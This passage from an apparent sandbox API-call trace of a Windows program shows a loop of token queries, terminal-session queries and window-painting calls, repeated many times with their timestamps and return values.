GetLastError () returned 0x7a [0071.922] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.922] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.922] WTSFreeMemory (pMemory=0x0) [0071.922] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.922] TextOutW (hdc=0x0, x=954, y=2149, lpString="", c=0) returned 1 [0071.922] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.922] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.922] GetTickCount () returned 0x1f121 [0071.924] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.924] SetForegroundWindow (hWnd=0x0) returned 0 [0071.924] BringWindowToTop (hWnd=0x0) returned 0 [0071.924] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3ac) returned 1 [0071.924] GetTokenInformation (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.924] GetLastError () returned 0x7a [0071.924] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.924] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.924] WTSFreeMemory (pMemory=0x0) [0071.924] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.924] TextOutW (hdc=0x0, x=964, y=2174, lpString="", c=0) returned 1 [0071.924] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.924] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.924] GetTickCount () returned 0x1f121 [0071.930] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.930] SetForegroundWindow (hWnd=0x0) returned 0 [0071.930] BringWindowToTop (hWnd=0x0) returned 0 [0071.930] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3b0) returned 1 [0071.930] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.930] GetLastError () returned 0x7a [0071.930] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.930] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.931] WTSFreeMemory (pMemory=0x0) [0071.931] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.931] TextOutW (hdc=0x0, x=974, y=2199, lpString="", c=0) returned 1 [0071.931] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.931] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.931] GetTickCount () returned 0x1f131 [0071.933] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.933] SetForegroundWindow (hWnd=0x0) returned 0 [0071.933] BringWindowToTop (hWnd=0x0) returned 0 [0071.933] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3b4) returned 1 [0071.933] GetTokenInformation (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.933] GetLastError () returned 0x7a [0071.933] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.933] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.933] WTSFreeMemory (pMemory=0x0) [0071.933] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.933] TextOutW (hdc=0x0, x=984, y=2224, lpString="", c=0) returned 1 [0071.933] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.933] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.933] GetTickCount () returned 0x1f131 [0071.934] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.934] SetForegroundWindow (hWnd=0x0) returned 0 [0071.934] BringWindowToTop (hWnd=0x0) returned 0 [0071.934] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3b8) returned 1 [0071.934] GetTokenInformation (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.934] GetLastError () returned 0x7a [0071.934] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.934] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.935] WTSFreeMemory (pMemory=0x0) [0071.935] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.935] TextOutW (hdc=0x0, x=994, y=2249, lpString="", c=0) returned 1 [0071.935] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.935] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.935] GetTickCount () returned 0x1f131 [0071.936] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.937] SetForegroundWindow (hWnd=0x0) returned 0 [0071.937] BringWindowToTop (hWnd=0x0) returned 0 [0071.937] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3bc) returned 1 [0071.937] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.937] GetLastError () returned 0x7a [0071.937] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.937] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.937] WTSFreeMemory (pMemory=0x0) [0071.937] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.937] TextOutW (hdc=0x0, x=1004, y=2274, lpString="", c=0) returned 1 [0071.937] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.937] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.937] GetTickCount () returned 0x1f131 [0071.938] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.938] SetForegroundWindow (hWnd=0x0) returned 0 [0071.938] BringWindowToTop (hWnd=0x0) returned 0 [0071.938] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3c0) returned 1 [0071.938] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.938] GetLastError () returned 0x7a [0071.938] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.938] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.939] WTSFreeMemory (pMemory=0x0) [0071.939] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.939] TextOutW (hdc=0x0, x=1014, y=2299, lpString="", c=0) returned 1 [0071.939] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.939] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.939] GetTickCount () returned 0x1f131 [0071.941] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.941] SetForegroundWindow (hWnd=0x0) returned 0 [0071.941] BringWindowToTop (hWnd=0x0) returned 0 [0071.941] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3c4) returned 1 [0071.941] GetTokenInformation (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.941] GetLastError () returned 0x7a [0071.941] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.941] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.942] WTSFreeMemory (pMemory=0x0) [0071.942] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.942] TextOutW (hdc=0x0, x=1024, y=2324, lpString="", c=0) returned 1 [0071.942] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.942] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.942] GetTickCount () returned 0x1f140 [0071.943] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.943] SetForegroundWindow (hWnd=0x0) returned 0 [0071.943] BringWindowToTop (hWnd=0x0) returned 0 [0071.943] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3c8) returned 1 [0071.943] GetTokenInformation (in: TokenHandle=0x3c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.943] GetLastError () returned 0x7a [0071.943] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.943] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.943] WTSFreeMemory (pMemory=0x0) [0071.943] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.943] TextOutW (hdc=0x0, x=1034, y=2349, lpString="", c=0) returned 1 [0071.943] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.943] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.944] GetTickCount () returned 0x1f140 [0071.945] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.945] SetForegroundWindow (hWnd=0x0) returned 0 [0071.945] BringWindowToTop (hWnd=0x0) returned 0 [0071.945] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3cc) returned 1 [0071.945] GetTokenInformation (in: TokenHandle=0x3cc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.945] GetLastError () returned 0x7a [0071.945] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.945] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.946] WTSFreeMemory (pMemory=0x0) [0071.946] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.946] TextOutW (hdc=0x0, x=1044, y=2374, lpString="", c=0) returned 1 [0071.946] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.946] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.946] GetTickCount () returned 0x1f140 [0071.947] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.947] SetForegroundWindow (hWnd=0x0) returned 0 [0071.947] BringWindowToTop (hWnd=0x0) returned 0 [0071.947] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3d0) returned 1 [0071.947] GetTokenInformation (in: TokenHandle=0x3d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.947] GetLastError () returned 0x7a [0071.947] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.947] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.947] WTSFreeMemory (pMemory=0x0) [0071.947] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.947] TextOutW (hdc=0x0, x=1054, y=2399, lpString="", c=0) returned 1 [0071.947] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.948] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.948] GetTickCount () returned 0x1f140 [0071.949] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.949] SetForegroundWindow (hWnd=0x0) returned 0 [0071.949] BringWindowToTop (hWnd=0x0) returned 0 [0071.949] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3d4) returned 1 [0071.949] GetTokenInformation (in: TokenHandle=0x3d4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.949] GetLastError () returned 0x7a [0071.949] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.949] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.950] WTSFreeMemory (pMemory=0x0) [0071.950] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.950] TextOutW (hdc=0x0, x=1064, y=2424, lpString="", c=0) returned 1 [0071.950] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.950] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.950] GetTickCount () returned 0x1f140 [0071.951] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.951] SetForegroundWindow (hWnd=0x0) returned 0 [0071.951] BringWindowToTop (hWnd=0x0) returned 0 [0071.951] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3d8) returned 1 [0071.951] GetTokenInformation (in: TokenHandle=0x3d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.951] GetLastError () returned 0x7a [0071.951] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.951] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.952] WTSFreeMemory (pMemory=0x0) [0071.952] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.952] TextOutW (hdc=0x0, x=1074, y=2449, lpString="", c=0) returned 1 [0071.952] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.952] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.952] GetTickCount () returned 0x1f140 [0071.954] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.954] SetForegroundWindow (hWnd=0x0) returned 0 [0071.954] BringWindowToTop (hWnd=0x0) returned 0 [0071.954] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3dc) returned 1 [0071.954] GetTokenInformation (in: TokenHandle=0x3dc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.954] GetLastError () returned 0x7a [0071.954] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.954] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.954] WTSFreeMemory (pMemory=0x0) [0071.954] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.955] TextOutW (hdc=0x0, x=1084, y=2474, lpString="", c=0) returned 1 [0071.955] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.955] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.955] GetTickCount () returned 0x1f140 [0071.955] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.955] SetForegroundWindow (hWnd=0x0) returned 0 [0071.955] BringWindowToTop (hWnd=0x0) returned 0 [0071.955] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3e0) returned 1 [0071.956] GetTokenInformation (in: TokenHandle=0x3e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.956] GetLastError () returned 0x7a [0071.956] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.956] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.958] WTSFreeMemory (pMemory=0x0) [0071.958] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.958] TextOutW (hdc=0x0, x=1094, y=2499, lpString="", c=0) returned 1 [0071.958] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.958] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.958] GetTickCount () returned 0x1f150 [0071.961] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.961] SetForegroundWindow (hWnd=0x0) returned 0 [0071.961] BringWindowToTop (hWnd=0x0) returned 0 [0071.961] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3e4) returned 1 [0071.961] GetTokenInformation (in: TokenHandle=0x3e4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.961] GetLastError () returned 0x7a [0071.961] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.961] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.962] WTSFreeMemory (pMemory=0x0) [0071.962] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.962] TextOutW (hdc=0x0, x=1104, y=2524, lpString="", c=0) returned 1 [0071.962] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.962] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.962] GetTickCount () returned 0x1f150 [0071.963] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.963] SetForegroundWindow (hWnd=0x0) returned 0 [0071.963] BringWindowToTop (hWnd=0x0) returned 0 [0071.963] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3e8) returned 1 [0071.963] GetTokenInformation (in: TokenHandle=0x3e8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.963] GetLastError () returned 0x7a [0071.963] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.963] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.964] WTSFreeMemory (pMemory=0x0) [0071.964] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.964] TextOutW (hdc=0x0, x=1114, y=2549, lpString="", c=0) returned 1 [0071.964] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.964] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.964] GetTickCount () returned 0x1f150 [0071.967] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.967] SetForegroundWindow (hWnd=0x0) returned 0 [0071.967] BringWindowToTop (hWnd=0x0) returned 0 [0071.967] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3ec) returned 1 [0071.967] GetTokenInformation (in: TokenHandle=0x3ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.967] GetLastError () returned 0x7a [0071.967] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.967] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.968] WTSFreeMemory (pMemory=0x0) [0071.968] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.968] TextOutW (hdc=0x0, x=1124, y=2574, lpString="", c=0) returned 1 [0071.968] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.968] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.968] GetTickCount () returned 0x1f150 [0071.969] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.969] SetForegroundWindow (hWnd=0x0) returned 0 [0071.969] BringWindowToTop (hWnd=0x0) returned 0 [0071.969] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3f0) returned 1 [0071.969] GetTokenInformation (in: TokenHandle=0x3f0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.969] GetLastError () returned 0x7a [0071.969] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.969] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.970] WTSFreeMemory (pMemory=0x0) [0071.970] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.970] TextOutW (hdc=0x0, x=1134, y=2599, lpString="", c=0) returned 1 [0071.970] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.970] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.970] GetTickCount () returned 0x1f150 [0071.973] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.973] SetForegroundWindow (hWnd=0x0) returned 0 [0071.973] BringWindowToTop (hWnd=0x0) returned 0 [0071.973] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3f4) returned 1 [0071.973] GetTokenInformation (in: TokenHandle=0x3f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.973] GetLastError () returned 0x7a [0071.973] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.973] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.974] WTSFreeMemory (pMemory=0x0) [0071.974] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.974] TextOutW (hdc=0x0, x=1144, y=2624, lpString="", c=0) returned 1 [0071.974] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.974] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.974] GetTickCount () returned 0x1f160 [0071.975] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.975] SetForegroundWindow (hWnd=0x0) returned 0 [0071.975] BringWindowToTop (hWnd=0x0) returned 0 [0071.975] OpenProcessToken (in: ProcessHandle=0xffffffff, 